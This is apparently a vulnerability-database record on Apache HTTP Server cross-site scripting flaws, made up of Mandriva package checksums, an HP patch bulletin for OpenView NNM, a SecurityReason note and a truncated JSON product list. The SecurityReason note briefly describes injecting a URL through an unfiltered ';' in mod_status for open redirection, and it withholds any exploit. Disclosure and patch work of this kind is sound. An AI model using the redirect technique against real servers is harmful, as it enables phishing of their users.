2007.0/x86_64/apache-mpm-worker-2.2.3-1.3mdv2007.0.x86_64.rpm e83551cd2c8365788b767f90c204a13d 2007.0/x86_64/apache-source-2.2.3-1.3mdv2007.0.x86_64.rpm f066c405e8993de4fa506d8c05d37b9e 2007.0/SRPMS/apache-2.2.3-1.3mdv2007.0.src.rpm

    Mandriva Linux 2007.1: cb95db6136cbe28610e3e9baab45abeb 2007.1/i586/apache-base-2.2.4-6.4mdv2007.1.i586.rpm 6f9a4f9e658d51acdb9b8230a3ff8d10 2007.1/i586/apache-devel-2.2.4-6.4mdv2007.1.i586.rpm 71499b6f32722a7af4b664849eac6320 2007.1/i586/apache-htcacheclean-2.2.4-6.4mdv2007.1.i586.rpm 4c747fdb75063c7bb9bd50c0dbc59a5b 2007.1/i586/apache-mod_authn_dbd-2.2.4-6.4mdv2007.1.i586.rpm a3cae606ac80d807f84177c60e8455c8 2007.1/i586/apache-mod_cache-2.2.4-6.4mdv2007.1.i586.rpm 0f518e3f63d47d1c5a8193d95030f52d 2007.1/i586/apache-mod_dav-2.2.4-6.4mdv2007.1.i586.rpm 3ad5c633a0dcc187aad028f48dfb5b92 2007.1/i586/apache-mod_dbd-2.2.4-6.4mdv2007.1.i586.rpm 5fa41f5ac0caecb71c639f78222d8cee 2007.1/i586/apache-mod_deflate-2.2.4-6.4mdv2007.1.i586.rpm 1b4b5d31d1596eaa30987921d0ab07be 2007.1/i586/apache-mod_disk_cache-2.2.4-6.4mdv2007.1.i586.rpm 597eb4248325c05c1fafae90378425d6 2007.1/i586/apache-mod_file_cache-2.2.4-6.4mdv2007.1.i586.rpm f868cb2c42e06ae77fe349c7d31e0958 2007.1/i586/apache-mod_ldap-2.2.4-6.4mdv2007.1.i586.rpm a8696226c9930799d1fbad199c5e7084 2007.1/i586/apache-mod_mem_cache-2.2.4-6.4mdv2007.1.i586.rpm 2b62f69a3f58f1c572cbd8e961c11043 2007.1/i586/apache-mod_proxy-2.2.4-6.4mdv2007.1.i586.rpm bea2a28dc594b5fb8ef0591a7bb91714 2007.1/i586/apache-mod_proxy_ajp-2.2.4-6.4mdv2007.1.i586.rpm 9719faa4845deef9dc95f4ceeefce0e6 2007.1/i586/apache-mod_ssl-2.2.4-6.4mdv2007.1.i586.rpm 938e503476cac7f68b57322494e8f471 2007.1/i586/apache-mod_userdir-2.2.4-6.4mdv2007.1.i586.rpm cd01ff99ebacfe90c317d253d7ac11c4 2007.1/i586/apache-modules-2.2.4-6.4mdv2007.1.i586.rpm 5d830472142486b008e84851f5befdf9 2007.1/i586/apache-mpm-event-2.2.4-6.4mdv2007.1.i586.rpm 48ec7cbe8edbd745cc8446f2d274d8b7 2007.1/i586/apache-mpm-itk-2.2.4-6.4mdv2007.1.i586.rpm ada3666e18e2c49eb4849afbdad60f75 2007.1/i586/apache-mpm-prefork-2.2.4-6.4mdv2007.1.i586.rpm 7830123c1e76e8d02ca0a140c2b5f6c6 2007.1/i586/apache-mpm-worker-2.2.4-6.4mdv2007.1.i586.rpm 6498cc5113689f513cbdcfae0a2a3ad4 2007.1/i586/apache-source-2.2.4-6.4mdv2007.1.i586.rpm a716565584726e4d2d94ca4796c1d403 2007.1/SRPMS/apache-2.2.4-6.4mdv2007.1.src.rpm

    Mandriva Linux 2007.1/X86_64: 839816f464191d3aff0882eac70cea40 2007.1/x86_64/apache-base-2.2.4-6.4mdv2007.1.x86_64.rpm ac4910f34cbf168df34cd123604b044b 2007.1/x86_64/apache-devel-2.2.4-6.4mdv2007.1.x86_64.rpm a4b4f9d518ed8621348527938f6a8230 2007.1/x86_64/apache-htcacheclean-2.2.4-6.4mdv2007.1.x86_64.rpm d554aa06a52bd72e20f035beedd50dcf 2007.1/x86_64/apache-mod_authn_dbd-2.2.4-6.4mdv2007.1.x86_64.rpm 68659f413d0b1102c220b1b4824489b6 2007.1/x86_64/apache-mod_cache-2.2.4-6.4mdv2007.1.x86_64.rpm d92ec9a9deb7d188e644075a18951ae6 2007.1/x86_64/apache-mod_dav-2.2.4-6.4mdv2007.1.x86_64.rpm 07b06f6de52f0f107106cead6f47de2c 2007.1/x86_64/apache-mod_dbd-2.2.4-6.4mdv2007.1.x86_64.rpm 6bf077871aa95d08c934eacac7f1291e 2007.1/x86_64/apache-mod_deflate-2.2.4-6.4mdv2007.1.x86_64.rpm b16f793759b09e75b7e162a5d858d835 2007.1/x86_64/apache-mod_disk_cache-2.2.4-6.4mdv2007.1.x86_64.rpm 635452cc08657fa5da5b65dc40bf2c1b 2007.1/x86_64/apache-mod_file_cache-2.2.4-6.4mdv2007.1.x86_64.rpm 7a238972b773975493d8931d573233ec 2007.1/x86_64/apache-mod_ldap-2.2.4-6.4mdv2007.1.x86_64.rpm 46704ca76800a5b967a4dd6e8efef986 2007.1/x86_64/apache-mod_mem_cache-2.2.4-6.4mdv2007.1.x86_64.rpm 3c23cff577f9697b719c90918ef91b44 2007.1/x86_64/apache-mod_proxy-2.2.4-6.4mdv2007.1.x86_64.rpm c4ea096a86cdab894cb59bb868b849f0 2007.1/x86_64/apache-mod_proxy_ajp-2.2.4-6.4mdv2007.1.x86_64.rpm 01f40dde7c3c93606c82681af472815f 2007.1/x86_64/apache-mod_ssl-2.2.4-6.4mdv2007.1.x86_64.rpm 9ade922fc7d52d73a47ca5f3cb2c7525 2007.1/x86_64/apache-mod_userdir-2.2.4-6.4mdv2007.1.x86_64.rpm 5e7e44ef5703f1e4fe5a952e5a3f5239 2007.1/x86_64/apache-modules-2.2.4-6.4mdv2007.1.x86_64.rpm e1b06e559e600461e19f9ab0f21d94be 2007.1/x86_64/apache-mpm-event-2.2.4-6.4mdv2007.1.x86_64.rpm 9903bcc1c12a86a9c2f9483d0ef9685e 2007.1/x86_64/apache-mpm-itk-2.2.4-6.4mdv2007.1.x86_64.rpm ce244cc42b6c411d2e3264c6ac6e1a76 2007.1/x86_64/apache-mpm-prefork-2.2.4-6.4mdv2007.1.x86_64.rpm 5989a935f4a0e20ac2844982e81cda83 2007.1/x86_64/apache-mpm-worker-2.2.4-6.4mdv2007.1.x86_64.rpm 339fccde52210eca1bf7e3cf05b9ce0e 2007.1/x86_64/apache-source-2.2.4-6.4mdv2007.1.x86_64.rpm a716565584726e4d2d94ca4796c1d403 2007.1/SRPMS/apache-2.2.4-6.4mdv2007.1.src.rpm

    Mandriva Linux 2008.0: cb013d3f4f40e2dfe6a90e0a2a7cdd74 2008.0/i586/apache-base-2.2.6-8.1mdv2008.0.i586.rpm f2e8d6e8191794fac34ddc7fc0f38588 2008.0/i586/apache-devel-2.2.6-8.1mdv2008.0.i586.rpm 8456184db4de115db70e603dbe252456 2008.0/i586/apache-htcacheclean-2.2.6-8.1mdv2008.0.i586.rpm 9e8861daffdf9d6b0ab431b1c3c1fac9 2008.0/i586/apache-mod_authn_dbd-2.2.6-8.1mdv2008.0.i586.rpm de1f407b2eb4d84140686375d3497006 2008.0/i586/apache-mod_cache-2.2.6-8.1mdv2008.0.i586.rpm eaf010272f97a507f37a6145bb9de809 2008.0/i586/apache-mod_dav-2.2.6-8.1mdv2008.0.i586.rpm 4d1073009151607b47ffcedc96cdb834 2008.0/i586/apache-mod_dbd-2.2.6-8.1mdv2008.0.i586.rpm cfc6f2958ef8d117d1070e422078cdfa 2008.0/i586/apache-mod_deflate-2.2.6-8.1mdv2008.0.i586.rpm 3c423e687c0afc1b224e6535e16ec279 2008.0/i586/apache-mod_disk_cache-2.2.6-8.1mdv2008.0.i586.rpm ef790e64feeaf1a9ee5c58fd7e3b359d 2008.0/i586/apache-mod_file_cache-2.2.6-8.1mdv2008.0.i586.rpm 8f86f4c499dfa14fb2daf4f8b578e150 2008.0/i586/apache-mod_ldap-2.2.6-8.1mdv2008.0.i586.rpm 21b1fc690f38b779ee79bed31c5fa3a2 2008.0/i586/apache-mod_mem_cache-2.2.6-8.1mdv2008.0.i586.rpm 0ec954d20d7a080cc9a19c2146480897 2008.0/i586/apache-mod_proxy-2.2.6-8.1mdv2008.0.i586.rpm 50a87c9099f0c094c9fbb763e334fae9 2008.0/i586/apache-mod_proxy_ajp-2.2.6-8.1mdv2008.0.i586.rpm 9d4e1c4a6614e70b77cd2e03e3baeaea 2008.0/i586/apache-mod_ssl-2.2.6-8.1mdv2008.0.i586.rpm 29346499f10a850f8011191b0d242709 2008.0/i586/apache-mod_userdir-2.2.6-8.1mdv2008.0.i586.rpm 21c5bc6f2861cc532c8b5dae3f3e1ee2 2008.0/i586/apache-modules-2.2.6-8.1mdv2008.0.i586.rpm 944b6d2f395f4d26deeef93f9ce55c5b 2008.0/i586/apache-mpm-event-2.2.6-8.1mdv2008.0.i586.rpm 0fc46d4eae684b21a9a98a6c876960b3 2008.0/i586/apache-mpm-itk-2.2.6-8.1mdv2008.0.i586.rpm ab00a26cd43e9045e66da620e9678412 2008.0/i586/apache-mpm-prefork-2.2.6-8.1mdv2008.0.i586.rpm 785499e86b70da53c76a7d3321da1b30 2008.0/i586/apache-mpm-worker-2.2.6-8.1mdv2008.0.i586.rpm c1ccaf747ebe4bd71f875f70c969d4e7 2008.0/i586/apache-source-2.2.6-8.1mdv2008.0.i586.rpm 2d535ab37b9a247e827054766219f7e6 2008.0/SRPMS/apache-2.2.6-8.1mdv2008.0.src.rpm

    Mandriva Linux 2008.0/X86_64: 56b868f5c7a86b68666af13fe2a5c925 2008.0/x86_64/apache-base-2.2.6-8.1mdv2008.0.x86_64.rpm 16ca885969a1bd9d7f6d4a00a7c33095 2008.0/x86_64/apache-devel-2.2.6-8.1mdv2008.0.x86_64.rpm 76bcdbe509c56ec471ff767f5f7f925f 2008.0/x86_64/apache-htcacheclean-2.2.6-8.1mdv2008.0.x86_64.rpm 36fc978398d6b8f406f0913ecac5576e 2008.0/x86_64/apache-mod_authn_dbd-2.2.6-8.1mdv2008.0.x86_64.rpm d6644c5729325e3a0f7bda5ffe12523c 2008.0/x86_64/apache-mod_cache-2.2.6-8.1mdv2008.0.x86_64.rpm 98e86f62995310727dc7b7343776c948 2008.0/x86_64/apache-mod_dav-2.2.6-8.1mdv2008.0.x86_64.rpm 7aa7da7cb9fc4f29071535620de42023 2008.0/x86_64/apache-mod_dbd-2.2.6-8.1mdv2008.0.x86_64.rpm 8cb681d914e9619adf261dca86154538 2008.0/x86_64/apache-mod_deflate-2.2.6-8.1mdv2008.0.x86_64.rpm 1ebc35b8050495230d6809f97dd89731 2008.0/x86_64/apache-mod_disk_cache-2.2.6-8.1mdv2008.0.x86_64.rpm 7db7d64521dc4253edc59645e79a5e57 2008.0/x86_64/apache-mod_file_cache-2.2.6-8.1mdv2008.0.x86_64.rpm 5624b75d6d1eb311e6332c6a7e10e42f 2008.0/x86_64/apache-mod_ldap-2.2.6-8.1mdv2008.0.x86_64.rpm e7049015c893a5a75d0c4bbc68e18615 2008.0/x86_64/apache-mod_mem_cache-2.2.6-8.1mdv2008.0.x86_64.rpm 910e8bcb28e00501ebd39aa9c30e3cad 2008.0/x86_64/apache-mod_proxy-2.2.6-8.1mdv2008.0.x86_64.rpm 2451f7726434398f715bac328422faa8 2008.0/x86_64/apache-mod_proxy_ajp-2.2.6-8.1mdv2008.0.x86_64.rpm c6a102776378eecfbe64f87d2a4f261b 2008.0/x86_64/apache-mod_ssl-2.2.6-8.1mdv2008.0.x86_64.rpm 27a79220cf963ba1dfe6f17d6e66d3f5 2008.0/x86_64/apache-mod_userdir-2.2.6-8.1mdv2008.0.x86_64.rpm e87a2f8d0e8cf23fe0cc3a7a44195f68 2008.0/x86_64/apache-modules-2.2.6-8.1mdv2008.0.x86_64.rpm 6224d03ea5169e71fd588ddff0b95f16 2008.0/x86_64/apache-mpm-event-2.2.6-8.1mdv2008.0.x86_64.rpm e61bcd69bd997a5cddacc2f58dd1f1b9 2008.0/x86_64/apache-mpm-itk-2.2.6-8.1mdv2008.0.x86_64.rpm 304a7257ba0104bb799c3ab6a09cb977 2008.0/x86_64/apache-mpm-prefork-2.2.6-8.1mdv2008.0.x86_64.rpm d19f57238828efc73f24ff69c1dca341 2008.0/x86_64/apache-mpm-worker-2.2.6-8.1mdv2008.0.x86_64.rpm e72351edf865715beac70996ca1ea09b 2008.0/x86_64/apache-source-2.2.6-8.1mdv2008.0.x86_64.rpm 2d535ab37b9a247e827054766219f7e6 2008.0/SRPMS/apache-2.2.6-8.1mdv2008.0.src.rpm

    Corporate 4.0: 0c36f90139943f6564058fb6c9a0028c corporate/4.0/i586/apache-base-2.2.3-1.3.20060mlcs4.i586.rpm 2c23db7c0c820a6d05cf9e89e10d437b corporate/4.0/i586/apache-devel-2.2.3-1.3.20060mlcs4.i586.rpm 6729c4c238ea40547ca8ad4ad34fac39 corporate/4.0/i586/apache-htcacheclean-2.2.3-1.3.20060mlcs4.i586.rpm 8c6b35f7192abf90e6af6a07c27099d0 corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.3.20060mlcs4.i586.rpm 6f3ae30580187b440261747c0f975ec6 corporate/4.0/i586/apache-mod_cache-2.2.3-1.3.20060mlcs4.i586.rpm 56dd118e6e37165e6638baab4e58d08e corporate/4.0/i586/apache-mod_dav-2.2.3-1.3.20060mlcs4.i586.rpm 6e3512489622cf59e0f32458d943f65b corporate/4.0/i586/apache-mod_dbd-2.2.3-1.3.20060mlcs4.i586.rpm 7946432730bdac3ec21ca376f8f8ca12 corporate/4.0/i586/apache-mod_deflate-2.2.3-1.3.20060mlcs4.i586.rpm eeac05dfe0a57512de566f6a2e1e105e corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.3.20060mlcs4.i586.rpm b50af44b3084fcff0bc6cff1ac50023f corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.3.20060mlcs4.i586.rpm a92816a879182cbca50ebace4bb5f193 corporate/4.0/i586/apache-mod_ldap-2.2.3-1.3.20060mlcs4.i586.rpm 2ca6a18de738a817cb346f1eb31bf76a corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.3.20060mlcs4.i586.rpm b984ff19a2458f844f62be84635060d1 corporate/4.0/i586/apache-mod_proxy-2.2.3-1.3.20060mlcs4.i586.rpm b816b9c09345b92da5a0216f5e9db932 corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.3.20060mlcs4.i586.rpm 240fb4ea33d91846fc083def26b19465 corporate/4.0/i586/apache-mod_ssl-2.2.3-1.3.20060mlcs4.i586.rpm afcda5d86a48edba71a81a8fda0d0f75 corporate/4.0/i586/apache-mod_userdir-2.2.3-1.3.20060mlcs4.i586.rpm 76705f36eb869b9a1520df0c09a7d1e9 corporate/4.0/i586/apache-modules-2.2.3-1.3.20060mlcs4.i586.rpm eb5bc900fa99aab700c29af7978ca44f corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.3.20060mlcs4.i586.rpm 57a7cb6d3fc97eca6c46685f606a3618 corporate/4.0/i586/apache-mpm-worker-2.2.3-1.3.20060mlcs4.i586.rpm 804752d26fd2db2088cbc73ee9aee8f5 corporate/4.0/i586/apache-source-2.2.3-1.3.20060mlcs4.i586.rpm ece351bfa879df71f200f00d143779b9 corporate/4.0/SRPMS/apache-2.2.3-1.3.20060mlcs4.src.rpm

    Corporate 4.0/X86_64: 74d411bb422230857a8971a9ce428c0e corporate/4.0/x86_64/apache-base-2.2.3-1.3.20060mlcs4.x86_64.rpm 5ede29fb5e502fdc96dbb4722b69bb26 corporate/4.0/x86_64/apache-devel-2.2.3-1.3.20060mlcs4.x86_64.rpm dcecf6dece1ec0c083f924b8e545b864 corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.3.20060mlcs4.x86_64.rpm b7bf0d94f575d6e1e42296b69e5d056b corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.3.20060mlcs4.x86_64.rpm 6718af7bd108e06d8e6be0046473ce69 corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.3.20060mlcs4.x86_64.rpm fce075627de036b3d71a93ceafa6105e corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.3.20060mlcs4.x86_64.rpm 973a484aed44fd0281c34a0227131400 corporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.3.20060mlcs4.x86_64.rpm 359ad6bfc294b82d14788ea3f2fb5b1f corporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.3.20060mlcs4.x86_64.rpm ce014700683860f81922680ab29d335b corporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.3.20060mlcs4.x86_64.rpm b918e9b9eeb06303a8b3f26f63666f74 corporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.3.20060mlcs4.x86_64.rpm 969c3cf38987f91d576de441e5781b5d corporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.3.20060mlcs4.x86_64.rpm e3c4128b336c45e9470e57a1439cead9 corporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.3.20060mlcs4.x86_64.rpm e6c07bd0bed38660852db97807e0b3dd corporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.3.20060mlcs4.x86_64.rpm d6b2621b48abe4c74ecd5e24e7c3c9f9 corporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.3.20060mlcs4.x86_64.rpm 166b443903e18e77afee950f368ae763 corporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.3.20060mlcs4.x86_64.rpm bcbd01a168655d57ad7dcbf424b4d91a corporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.3.20060mlcs4.x86_64.rpm 3723d163f681e478e677c75a286f352e corporate/4.0/x86_64/apache-modules-2.2.3-1.3.20060mlcs4.x86_64.rpm f17cbd7d765045b30dd43f62efb7cfd3 corporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.3.20060mlcs4.x86_64.rpm 6e704ce4a8ab0b5817273af16b997ea2 corporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.3.20060mlcs4.x86_64.rpm f35f2e3795dba910451ac03ec63f8898 corporate/4.0/x86_64/apache-source-2.2.3-1.3.20060mlcs4.x86_64.rpm ece351bfa879df71f200f00d143779b9 corporate/4.0/SRPMS/apache-2.2.3-1.3.20060mlcs4.src.rpm


    To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

    All packages are signed by Mandriva for security. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c01607570 Version: 1

    HPSBMA02388 SSRT080059 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Cross Site Scripting (XSS)

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2008-11-19 Last Updated: 2008-11-19

    Potential Security Impact: Remote cross site scripting (XSS)

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). The vulnerabilities could be exploited remotely to allow cross site scripting (XSS).

    References: CVE-2007-6388, CVE-2007-5000

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Linux, and Solaris

    BACKGROUND

    CVSS 2.0 Base Metrics

    Reference Base Vector Base Score CVE-2007-6388 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2007-5000 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 =============================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

    RESOLUTION

    HP has made patches available to resolve the vulnerabilities.

    The patches are available from http://itrc.hp.com

    OV NNM v7.53

    Operating_System - HP-UX (IA) Resolved in Patch - PHSS_38148 or subsequent

    Operating_System - HP-UX (PA) Resolved in Patch - PHSS_38147 or subsequent

    Operating_System - Linux RedHatAS2.1 Resolved in Patch - LXOV_00085 or subsequent

    Operating_System - Linux RedHat4AS-x86_64 Resolved in Patch - LXOV_00086 or subsequent

    Operating_System - Solaris Resolved in Patch - PSOV_03514 or subsequent

    OV NNM v7.51

    Upgrade to NNM v7.53 and install the patches listed above.

    OV NNM v7.01

    Operating_System - HP-UX (PA) Resolved in Patch - PHSS_38761 or subsequent

    Operating_System - Solaris Resolved in Patch - PSOV_03516 or subsequent

    MANUAL ACTIONS: Yes - NonUpdate Apply the appropriate file as described in the Resolution.

    PRODUCT SPECIFIC INFORMATION

    HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa

    The following text is for use by the HP-UX Software Assistant.

    AFFECTED VERSIONS (for HP-UX)

    For HP-UX OV NNM 7.53 HP-UX B.11.31 HP-UX B.11.23 (IA) ============= OVNNMgr.OVNNM-RUN action: install PHSS_38148 or subsequent URL: http://itrc.hp.com

    HP-UX B.11.23 (PA) HP-UX B.11.11 ============= OVNNMgr.OVNNM-RUN action: install PHSS_38147 or subsequent URL: http://itrc.hp.com

    For HP-UX OV NNM 7.51 HP-UX B.11.31 HP-UX B.11.23 HP-UX B.11.11 ============= OVNNMgr.OVNNM-RUN action: upgrade NNM v7.51 to NNM v7.53 and apply the appropriate patches

    For HP-UX OV NNM 7.01 HP-UX B.11.00 HP-UX B.11.11 ============= OVNNMgr.OVNNM-RUN action: install PHSS_38761 or subsequent URL: http://itrc.hp.com

    END AFFECTED VERSIONS (for HP-UX)

    HISTORY Version:1 (rev.1) - 19 November 2008 Initial release

    Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For further information, contact normal HP Services support channel.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key

    Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

    To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

    To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

    • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

    System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

    "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

    \xa9Copyright 2008 Hewlett-Packard Development Company, L.P.

    Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1

    iQA/AwUBSSQhVOAfOvwtKn1ZEQIlVQCg4n4fABzC24c9qQ5gz68oPLMVKI0AoMbs A2UIaH3YB7z+o42Tm7Eg7ahn =lskD -----END PGP SIGNATURE----- . The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards.

    Apache has been the most popular web server on the Internet since April 1996. The November 2005 Netcraft Web Server Survey found that more than 70% of the web sites on the Internet are using Apache, thus making it more widely used than all other web servers combined.

    mod_status : http://httpd.apache.org/docs/2.0/mod/mod_status.html

    • From apache site : "The Status module allows a server administrator to find out how well their server is performing. A HTML page is presented that gives the current server statistics in an easily readable form. If required this page can be made to automatically refresh (given a compatible browser). Another page gives a simple machine-readable list of the current server state."

    • --- 1. Apache Refresh Header - Open Redirector (XSS) Vulnerability ---

    During the fact that Apache mod_status do not filter char ";" we can inject new URL. This fact give attacker open redirector and can lead to phishing attack. Also attacker can create more advanced method to trigger XSS on victim's browser. Exploit ---

    SecurityReason is not going to release a exploit to the general public. Exploit was provided and tested for Apache Team . References ---

    A Refreshing Look at Redirection : http://www.securityfocus.com/archive/1/450418 by Amit Klein

    • --- 5. Greets ---

    For: Maksymilian Arciemowicz ( cXIb8O3 ), Infospec, pi3, p_e_a, mpp

    • --- 6. HP-UX B.11.11, B.11.23, B.11.31 running Apache v2.0.59.00.2 or earlier

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "http server",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "apache",
            "version": "1.3.2"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.35"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.2.0"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "apache",
            "version": "1.3.39"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.2.6"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "apache",
            "version": "2.0.61"
          },
          {
            "_id": null,
            "model": "interstage job workload server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "8.1"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2007.0"
          },
          {
            "_id": null,
            "model": "interstage application server standard-j edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.49"
          },
          {
            "_id": null,
            "model": "2.2.5-dev",
            "scope": null,
            "trust": 0.3,
            "vendor": "apache",
            "version": null
          },
          {
            "_id": null,
            "model": "interstage studio enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "8.0.1"
          },
          {
            "_id": null,
            "model": "certificate server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "7.3"
          },
          {
            "_id": null,
            "model": "interstage application server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "openvms secure web server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.3"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.35"
          },
          {
            "_id": null,
            "model": "interstage application server enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "5.0.1"
          },
          {
            "_id": null,
            "model": "multi network firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "hp-ux b.11.23",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "interstage application server plus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "interstage apworks modelers-j edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "11x64"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "apache",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apache",
            "version": "2.0.50"
          },
          {
            "_id": null,
            "model": "workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "6.5.1"
          },
          {
            "_id": null,
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.10"
          },
          {
            "_id": null,
            "model": "2.2.7-dev",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "apache",
            "version": null
          },
          {
            "_id": null,
            "model": "interstage application server plus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "fujitsu",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "interstage application server plus developer",
            "scope": "eq",
